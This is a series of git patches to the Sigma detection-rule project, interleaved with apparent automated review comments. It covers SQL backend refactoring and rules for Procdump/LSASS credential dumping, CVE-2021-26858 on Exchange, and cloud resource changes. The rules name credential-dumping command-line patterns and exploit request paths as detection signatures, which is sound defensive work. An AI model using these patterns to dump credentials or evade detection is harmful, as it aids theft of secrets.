@@ -142,6 +141,47 @@ class SQLBackend(SingleTextQueryBackend): """ return fieldname + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + fields = list() + + # First add fields specified in the rule + try: + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + if type(mapped) == str: + fields.append(mapped) + elif type(mapped) == list: + fields.extend(mapped) + else: + raise TypeError("Field mapping must return string or list") + + except KeyError: # no 'fields' attribute + pass + + # Then add fields specified in the backend configuration + fields.extend(self.select_fields) + + # Finally, in case fields is empty, add the default value + if not fields: + fields = list("*") + + for parsed in sigmaparser.condparsed: + #query = self.generateQuery(parsed) + query = self._generateQueryWithFields(parsed, fields) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + def cleanValue(self, val): if not isinstance(val, str): return str(val) 
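Review bot: The `try`/`except KeyError` in the new `generate()` wraps the whole field-mapping loop, so a KeyError raised inside `get_fieldmapping()` or `resolve_fieldname()` is silently treated as "rule has no fields" instead of surfacing. Read the list up front and drop the try: `for field in sigmaparser.parsedyaml.get("fields", []):`. `fields = list("*")` only yields `['*']` because the string is one character (`list("ab")` would be `['a', 'b']`); write the intended literal `fields = ["*"]`. If the option framework fills in the declared `select` default of `*` (not visible here), `self.select_fields` is always `['*']` and a rule with `fields:` produces `SELECT User, CommandLine, *` — worth checking with one rule that has `fields` before merging.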
@@ -191,12 +231,24 @@ class SQLBackend(SingleTextQueryBackend): return temp_table, agg_condition raise NotImplementedError("{} aggregation not implemented in SQL Backend".format(agg.aggfunc_notrans)) - + def generateQuery(self, parsed): + return self._generateQueryWithFields(parsed, list("*")) + + def checkFTS(self, parsed, result): if self._recursiveFtsSearch(parsed.parsedSearch): raise NotImplementedError("FullTextSearch not implemented for SQL Backend.") + + def _generateQueryWithFields(self, parsed, fields): + """ + Return a SQL query with fields specified. + """ + result = self.generateNode(parsed.parsedSearch) - select = ", ".join(self.select_fields) + + self.checkFTS(parsed, result) + + select = ", ".join(fields) if parsed.parsedAgg: #Handle aggregation diff --git a/tools/sigma/backends/sqlite.py b/tools/sigma/backends/sqlite.py index 8eec13ea..1f7e4e7e 100644 --- a/tools/sigma/backends/sqlite.py +++ b/tools/sigma/backends/sqlite.py @@ -18,7 +18,6 @@ from sigma.backends.sql import SQLBackend from sigma.parser.condition import NodeSubexpression, ConditionAND, ConditionOR, ConditionNOT import re - class SQLiteBackend(SQLBackend): """Converts Sigma rule into SQL query for SQLite""" identifier = "sqlite" @@ -26,6 +25,8 @@ class SQLiteBackend(SQLBackend): mapFullTextSearch = "%s MATCH ('\"%s\"')" + countFTS = 0 + def __init__(self, sigmaconfig, table): super().__init__(sigmaconfig, table) self.mappingItem = False 
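Review bot: `checkFTS()` and `_generateQueryWithFields()` are new subclass hooks without docstrings, and `checkFTS`'s `result` parameter is unused in this base implementation, which a subclass author cannot tell without reading sqlite.py. Suggested docstrings: for `checkFTS`, `"""Raise NotImplementedError if the parsed rule uses full-text search; `result` is the generated WHERE clause, available to subclasses for their error message."""`, and for `_generateQueryWithFields`, `"""Build SELECT <fields> FROM <table> WHERE <condition> for one parsed condition; `fields` is a non-empty list of column names joined verbatim, without quoting."""`. `list("*")` in `generateQuery` relies on the string being a single character; `["*"]` is the intended literal. The body of `_generateQueryWithFields` continues past the end of the hunk.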
@@ -108,16 +109,10 @@ class SQLiteBackend(SQLBackend): return self.generateFTS(self.cleanValue(str(node))) def generateQuery(self, parsed): - self.countFTS = 0 - result = self.generateNode(parsed.parsedSearch) + return self._generateQueryWithFields(parsed, list("*")) + + def checkFTS(self, parsed, result): if self.countFTS > 1: raise NotImplementedError( "Match operator ({}) is allowed only once in SQLite, parse rule in a different way:\n{}".format(self.countFTS, result)) self.countFTS = 0 - - if parsed.parsedAgg: - # Handle aggregation - fro, whe = self.generateAggregation(parsed.parsedAgg, result) - return "SELECT * FROM {} WHERE {}".format(fro, whe) - - return "SELECT * FROM {} WHERE {}".format(self.table, result) From 3028eb68b64b6293678931611c072b98ff27ce7a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 13:55:00 +0200 Subject: [PATCH 0402/1367] refactoring: procdump rules --- ...sysmon_lsass_memory_dump_file_creation.yml | 5 ++-- .../windows/process_creation/win_procdump.yml | 28 +++++++++++++++++++ .../process_creation/win_renamed_procdump.yml | 16 +++++------ .../process_creation/win_susp_procdump.yml | 6 ++-- 4 files changed, 43 insertions(+), 12 deletions(-) create mode 100644 rules/windows/process_creation/win_procdump.yml diff --git a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml index b61b425a..277c0b97 100755 --- a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml +++ b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml @@ -5,7 +5,7 @@ author: Teymur Kheirkhabarov, oscd.community references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment date: 2019/10/22 -modified: 2020/08/23 +modified: 2021/08/16 tags: - attack.credential_access - attack.t1003 # an old one 
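Review bot: The new `checkFTS()` resets `self.countFTS` only after the `> 1` test passes, so when it raises the count is left stale and the next rule converted by the same backend instance fails with an inflated count; the removed `generateQuery` body reset the counter at the start of every conversion. Swap the order: `count, self.countFTS = self.countFTS, 0` followed by `if count > 1: raise NotImplementedError(...)` using `count` in the message. Because the counter is now a class attribute (`countFTS = 0` in the earlier hunk) rather than being zeroed per call, an explicit `self.countFTS = 0` in `__init__` would also make the first conversion independent of class-level state.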
@@ -23,5 +23,6 @@ fields: - TargetFileName falsepositives: - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator -level: medium + - Dumps of another process that contains lsass in its process name (substring) +level: high status: experimental diff --git a/rules/windows/process_creation/win_procdump.yml b/rules/windows/process_creation/win_procdump.yml new file mode 100644 index 00000000..1f02d04b --- /dev/null +++ b/rules/windows/process_creation/win_procdump.yml @@ -0,0 +1,28 @@ +title: Procdump Usage +id: 03795938-1387-481b-9f4c-3f6241e604fe +description: Detects uses of the SysInternals Procdump utility +status: experimental +references: + - Internal Research +author: Florian Roth +date: 2021/08/16 +tags: + - attack.defense_evasion + - attack.t1036 + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|endswith: + - '\procdump.exe' + - '\procdump64.exe' + selection2: + CommandLine|contains|all: + - ' -ma ' + - '.exe' + condition: selection1 or selection2 +falsepositives: + - Legitimate use of procdump by a developer or administrator +level: medium diff --git a/rules/windows/process_creation/win_renamed_procdump.yml b/rules/windows/process_creation/win_renamed_procdump.yml index 8b9bad99..88783c5d 100644 --- a/rules/windows/process_creation/win_renamed_procdump.yml +++ b/rules/windows/process_creation/win_renamed_procdump.yml @@ -6,7 +6,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth date: 2019/11/18 -modified: 2021/04/29 +modified: 2021/08/16 tags: - attack.defense_evasion - attack.t1036 # an old one 
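Review bot: `selection2` in the new win_procdump.yml requires `' -ma '` and `'.exe'` together, but nearly every process_creation CommandLine contains the image path ending in .exe, so the `.exe` term adds no discrimination and the selection is effectively `CommandLine|contains: ' -ma '`. If the intent is the dump target (`procdump -ma lsass.exe`), anchor on the target instead, e.g. `CommandLine|contains: ' -ma lsass'` plus any other processes of interest, or drop `.exe` and say in the description that `-ma` alone is the trigger. In the latter case the `falsepositives` list should also mention other tools that take a `-ma` switch, since the medium level implies those are expected.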
@@ -17,19 +17,19 @@ logsource: detection: selection1: OriginalFileName: 'procdump' - filter1: - Image|endswith: - - '\procdump.exe' - - '\procdump64.exe' selection2: CommandLine|contains|all: - ' -ma ' - ' -accepteula ' - filter2: - CommandLine|contains: + selection3: + CommandLine|contains|all: + - ' -ma ' + - '.dmp' + filter: + Image|endswith: - '\procdump.exe' - '\procdump64.exe' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) + condition: ( selection1 or selection2 or selection3 ) and not filter falsepositives: - Procdump illegaly bundled with legitimate software - Weird admins who renamed binaries diff --git a/rules/windows/process_creation/win_susp_procdump.yml b/rules/windows/process_creation/win_susp_procdump.yml index 4a700b6a..288002fa 100644 --- a/rules/windows/process_creation/win_susp_procdump.yml +++ b/rules/windows/process_creation/win_susp_procdump.yml @@ -1,11 +1,12 @@ title: Suspicious Use of Procdump id: 03795938-1387-481b-9f4c-3f6241e604fe -description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ' -ma '. This way we're also able to catch cases in which the attacker has renamed the procdump executable. +description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ' -ma ' and ' -accepteula' in a single step. This way we're also able to catch cases in which the attacker has renamed the procdump executable. status: experimental references: - Internal Research author: Florian Roth date: 2021/02/02 +modified: 2021/08/16 tags: - attack.defense_evasion - attack.t1036 @@ -17,8 +18,9 @@ detection: selection: CommandLine|contains: - ' -ma ' + - ' -accepteula ' condition: selection falsepositives: - Another tool that uses the command line switches of Procdump - Legitimate use of procdump by a developer or administrator -level: medium +level: high \ No newline at end of file 
From e1b99db1497b0e0b333b6c97ba63de8aac3b1893 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 15:50:14 +0200 Subject: [PATCH 0403/1367] fix duplicate uuid --- rules/windows/process_creation/win_procdump.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_procdump.yml b/rules/windows/process_creation/win_procdump.yml index 1f02d04b..697a761b 100644 --- a/rules/windows/process_creation/win_procdump.yml +++ b/rules/windows/process_creation/win_procdump.yml @@ -1,5 +1,5 @@ title: Procdump Usage -id: 03795938-1387-481b-9f4c-3f6241e604fe +id: 2e65275c-8288-4ab4-aeb7-6274f58b6b20 description: Detects uses of the SysInternals Procdump utility status: experimental references: From d2790f24507212702653c9502a0ba57a0663cc24 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 16:14:48 +0200 Subject: [PATCH 0404/1367] fix: missing "|all" modifier --- rules/windows/process_creation/win_susp_procdump.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_procdump.yml b/rules/windows/process_creation/win_susp_procdump.yml index 288002fa..7c3256d9 100644 --- a/rules/windows/process_creation/win_susp_procdump.yml +++ b/rules/windows/process_creation/win_susp_procdump.yml @@ -16,11 +16,11 @@ logsource: product: windows detection: selection: - CommandLine|contains: + CommandLine|contains|all: - ' -ma ' - ' -accepteula ' condition: selection falsepositives: - Another tool that uses the command line switches of Procdump - Legitimate use of procdump by a developer or administrator -level: high \ No newline at end of file +level: high From c7831a3d70e48a9576bd43e438ad918cab545fb6 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Mon, 16 Aug 2021 09:45:31 -0500 Subject: [PATCH 0405/1367] Update gcp_vpn_tunnel_modified_or_deleted.yml --- .../gcp_vpn_tunnel_modified_or_deleted.yml | 25 +++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml index 139597f9..9c2e9c01 100644 --- a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml @@ -1,2 +1,23 @@ - - +title: Google Cloud VPN Tunnel Modified or Deleted +id: 99980a85-3a61-43d3-ac0f-b68d6b4797b1 +description: Identifies when a VPN Tunnel Modified or Deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://any-api.com/googleapis_com/compute/docs/vpnTunnels +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - compute.vpnTunnels.insert + - compute.vpnTunnels.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - VPN Tunnel being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ed507b82f42f5f41c52ec90e2594ea25af4cb8fb Mon Sep 17 00:00:00 2001 
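Review bot: The title and description say "Modified or Deleted", but the only values matched in `gcp.audit.method_name` are `compute.vpnTunnels.insert` and `compute.vpnTunnels.delete`, i.e. creation and deletion; no modification method is listed, so a change to an existing tunnel will not trigger this rule. Either rename to "Google Cloud VPN Tunnel Created or Deleted" (the EKS rule in the next patch of this series takes that wording) or add the method name(s) from the referenced vpnTunnels API that actually alter an existing tunnel. A bare `attack.impact` tag is a weak mapping; if the scenario is an adversary dropping the tunnel to disrupt connectivity, adding a technique such as `attack.t1489` would make that explicit.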
From: Austin Songer Date: Mon, 16 Aug 2021 09:58:48 -0500 Subject: [PATCH 0406/1367] Update and rename aws_eks_cluster_modified_or_deleted.yml to aws_eks_cluster_created_or_deleted.yml --- .../aws_eks_cluster_created_or_deleted.yml | 25 +++++++++++++++++++ .../aws_eks_cluster_modified_or_deleted.yml | 1 - 2 files changed, 25 insertions(+), 1 deletion(-) create mode 100644 rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml delete mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml new file mode 100644 index 00000000..1c07e6bb --- /dev/null +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -0,0 +1,25 @@ + +title: AWS EKS Cluster Created or Deleted +id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 +description: Identifies when an EKS cluster is created or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://any-api.com/amazonaws_com/eks/docs/API_Description +logsource: + service: cloudtrail +detection: + selection: + eventSource: eks.amazonaws.com + eventName: + - CreateCluster + - DeleteCluster + condition: selection +level: low +tags: + - attack. +falsepositives: + - EKS Cluster being created or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml deleted file mode 100644 index 8b137891..00000000 --- a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml +++ /dev/null @@ -1 +0,0 @@ - From 76d956e11033d651e8410741f78b856a94c2a548 Mon Sep 17 00:00:00 2001 
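Review bot: The second and third `falsepositives` entries ("Verify whether the user identity, user agent, and/or hostname…", "…from unfamiliar users should be investigated…") are triage instructions rather than sources of false positives, and the same three-bullet template is repeated across the GCP and Azure rules in this series; Sigma's `falsepositives` field is meant to list benign activity that triggers the rule so consumers can filter it, which here is only the first bullet. Consider `falsepositives: - EKS clusters created or deleted by an administrator or an automation/IaC pipeline` and moving the verification advice into `description`, where it reads as guidance rather than as an exemption.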
From: frack113 Date: Mon, 16 Aug 2021 18:12:17 +0200 Subject: [PATCH 0407/1367] update test_missing_id --- tests/test_rules.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index e3fac59b..8abaaf80 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -234,7 +234,7 @@ class TestRules(unittest.TestCase): def test_missing_id(self): faulty_rules = [] - list_id = [] + dict_id = {} for file in self.yield_next_rule_file_path(self.path_to_rules): id = self.get_rule_part(file_path=file, part_name="id") if not id: @@ -243,11 +243,11 @@ class TestRules(unittest.TestCase): elif len(id) != 36: print(Fore.YELLOW + "Rule {} has a malformed 'id' (not 36 chars).".format(file)) faulty_rules.append(file) - elif id in list_id: - print(Fore.YELLOW + "Rule {} has a duplicate 'id'.".format(file)) + elif id in dict_id.keys(): + print(Fore.YELLOW + "Rule {} has the same 'id' than {} must be unique.".format(file,dict_id[id])) faulty_rules.append(file) else: - list_id.append(id) + dict_id[id] = file self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") From 06840be3e7fa65d9fd12031786dbc13c70b1f41d Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 18:46:25 +0200 Subject: [PATCH 0408/1367] fix author --- rules/windows/builtin/win_anomaly_process_execution.yml | 1 + rules/windows/builtin/win_powershelll_empire.yml | 1 + rules/windows/builtin/win_user_acc_added_removed.yml | 1 + rules/windows/builtin/win_user_acc_enabled_disabled.yml | 1 + .../windows/builtin/win_user_created_added_to_bultin_admins.yml | 1 + 5 files changed, 5 insertions(+) diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml index 176d64bd..c49f18c2 100644 --- a/rules/windows/builtin/win_anomaly_process_execution.yml 
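Review bot: `elif id in dict_id.keys():` makes a needless `.keys()` call — `in` on a dict already tests keys — and the new message "has the same 'id' than {} must be unique" is ungrammatical, which matters because this string is exactly what a contributor sees when the test fails. Suggest `elif id in dict_id:` and `print(Fore.YELLOW + "Rule {} has the same 'id' as {}; ids must be unique.".format(file, dict_id[id]))`. The local `id` shadows the builtin; that predates this patch, but `rule_id` would be a cheap improvement while the lines are being touched. The `test_missing_id` body is partly outside these two hunks.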
+++ b/rules/windows/builtin/win_anomaly_process_execution.yml @@ -1,6 +1,7 @@ title: Process Execution Anomaly id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml index 6dc937fe..a765f45d 100644 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ b/rules/windows/builtin/win_powershelll_empire.yml @@ -1,6 +1,7 @@ title: Powershell Empire Cmdlets Seen In Command Line id: ef88eb96-861c-43a0-ab16-f3835a97c928 description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml index f8ee4d37..8e083b64 100644 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ b/rules/windows/builtin/win_user_acc_added_removed.yml @@ -1,6 +1,7 @@ title: Account Added And Removed From Privileged Groups id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml index 72857cbc..920efc48 100644 --- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml +++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml 
@@ -1,6 +1,7 @@ title: User Account Enabled And Disabled id: 3d023f64-8225-41a2-9570-2bd7c2c4535e description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml index 3eb3c977..57bb606c 100644 --- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml +++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml @@ -1,6 +1,7 @@ title: New Uer Created And Added To The Built-in Administrators Group id: aa1eff90-29d4-49dc-a3ea-b65199f516db description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 From cfb863a98e199097d116694626f27c786ffc35a6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 11:52:22 -0500 Subject: [PATCH 0409/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 1c07e6bb..36d21067 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,5 +1,4 @@ - -title: AWS EKS Cluster Created or Deleted + title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. author: Austin Songer From 2a3acd7d119f561bc9f17bac2de6bd4fc2f3ca16 Mon Sep 17 00:00:00 2001 
From: Theo Guidoux Date: Mon, 16 Aug 2021 19:32:54 +0200 Subject: [PATCH 0410/1367] add selection flag for backward compatibility --- tools/sigma/backends/sql.py | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index f18cac2f..b31fba2b 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -46,7 +46,10 @@ class SQLBackend(SingleTextQueryBackend): options = SingleTextQueryBackend.options + ( ("table", "eventlog", "Use this option to specify table name.", None), ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), + ("selection", False, "Use this option to enable fields selection from Sigma rules.", None), ) + + selection_enabled = False def __init__(self, sigmaconfig, options): @@ -62,6 +65,9 @@ class SQLBackend(SingleTextQueryBackend): else: self.select_fields = list() + if "selection" in options: + self.selection_enabled = True + def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] @@ -162,13 +168,19 @@ class SQLBackend(SingleTextQueryBackend): # Then add fields specified in the backend configuration fields.extend(self.select_fields) + # In case select is specified in backend option, we want to enable selection + if len(self.select_fields) > 0: + self.selection_enabled = True + # Finally, in case fields is empty, add the default value if not fields: fields = list("*") for parsed in sigmaparser.condparsed: - #query = self.generateQuery(parsed) - query = self._generateQueryWithFields(parsed, fields) + if self.selection_enabled: + query = self._generateQueryWithFields(parsed, fields) + else: + query = self.generateQuery(parsed) before = self.generateBefore(parsed) after = self.generateAfter(parsed) From 80062ff5cdd250a05896ac01b40d929391de33fd Mon Sep 17 00:00:00 2001 
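Review bot: `if "selection" in options: self.selection_enabled = True` tests only for the key's presence, so the value a user passes is ignored and `--backend-option selection=false` (or `selection=0`) enables field selection exactly like `selection=true`, even though the option is declared with a `False` default that announces a boolean. If `options` is the mapping of backend options, read the value instead, e.g. `self.selection_enabled = str(options.get("selection", False)).lower() in ("1", "true", "yes")`. The help text could also say that `select=` implies it, since the `generate` hunk below turns `selection_enabled` on whenever `select_fields` is non-empty. The `__init__` method continues outside this hunk.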
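Review bot: `fields = list("*")` yields `['*']` only because the literal is a single character; it reads like a bug waiting for the default to become `"*, rowid"` and turn into a list of characters — write `fields = ["*"]` (the same idiom appears in `SQLiteBackend.generateQuery` earlier in this series). Setting `self.selection_enabled = True` inside `generate` also mutates the backend instance on the first rule that carries select fields and persists for every later rule converted by the same instance; that is presumably intended since `select_fields` is backend-level configuration, but a comment such as `# select= implies selection for every rule converted by this backend` would stop it being read as a leak. The enclosing method starts and ends outside the hunk.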
From: Austin Songer Date: Mon, 16 Aug 2021 12:42:14 -0500 Subject: [PATCH 0411/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 36d21067..cf4598c6 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,4 +1,4 @@ - title: AWS EKS Cluster Created or Deleted +title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. author: Austin Songer From accb675ed54a7b63f09d2897093c22ba022c08b8 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 20:36:55 +0200 Subject: [PATCH 0412/1367] fix error space --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index cf4598c6..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,5 +1,5 @@ title: AWS EKS Cluster Created or Deleted -id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 +id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. author: Austin Songer status: experimental 
@@ -12,12 +12,12 @@ detection: selection: eventSource: eks.amazonaws.com eventName: - - CreateCluster - - DeleteCluster + - CreateCluster + - DeleteCluster condition: selection level: low tags: - - attack. + - attack.impact falsepositives: - EKS Cluster being created or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. From e098fc73cb2fb18c723fd9727e116e9dc9bcb22e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 17 Aug 2021 06:24:04 +0200 Subject: [PATCH 0413/1367] add keywords condition --- rules/web/web_cve_2021_26858_iis_rce.yml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index d630eafe..12b98180 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -19,7 +19,14 @@ detection: - 'schema=Reset' - 'VirtualDirectory' cs-username|endswith: '$' - condition: selection + keywords: + - 'POST' + - '200' + - '/ecp/DDI/DDIService.svc/SetObject' + - 'schema=Reset' + - 'VirtualDirectory' + - '$' + condition: selection or all of keywords falsepositives: - Unlikely level: critical From 144cfcb016ed9d3fcb3523ed883dabc5b675b67b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:30:30 -0500 Subject: [PATCH 0414/1367] Create azure_application_gateway_modified_or_deleted.yml --- ...pplication_gateway_modified_or_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml b/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml new file mode 100644 index 00000000..bb7b1e75 --- /dev/null +++ b/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml 
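Review bot: The new `keywords` list carries `'200'` and `'$'` as free-text terms; under `all of keywords` they are ANDed with the rest, but on their own they match almost every IIS log line (any 200 response, any machine-account user) and add nothing that `'/ecp/DDI/DDIService.svc/SetObject'` and `'schema=Reset'` do not already provide, while `'$'` is a character several query languages treat specially, so the converted queries should be checked per backend — I cannot see them from this hunk. Consider dropping `'200'` and `'$'` from the keyword branch, keeping the field-based `selection` (whose start is above the hunk) as the precise form, and noting in `description` that the keyword branch exists for log sources without parsed IIS fields.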
@@ -0,0 +1,23 @@ +title: Azure Application Gateway Modified or Deleted +id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6 +description: Identifies when a application gateway is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application gateway being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 3c8f27ba7683107da043612c0e0c25792bc4859e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:31:45 -0500 Subject: [PATCH 0415/1367] Create azure_application_security_group_modified_or_deleted.yml --- ...ion_security_group_modified_or_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml b/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml new file mode 100644 index 00000000..686380ee --- /dev/null +++ b/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml 
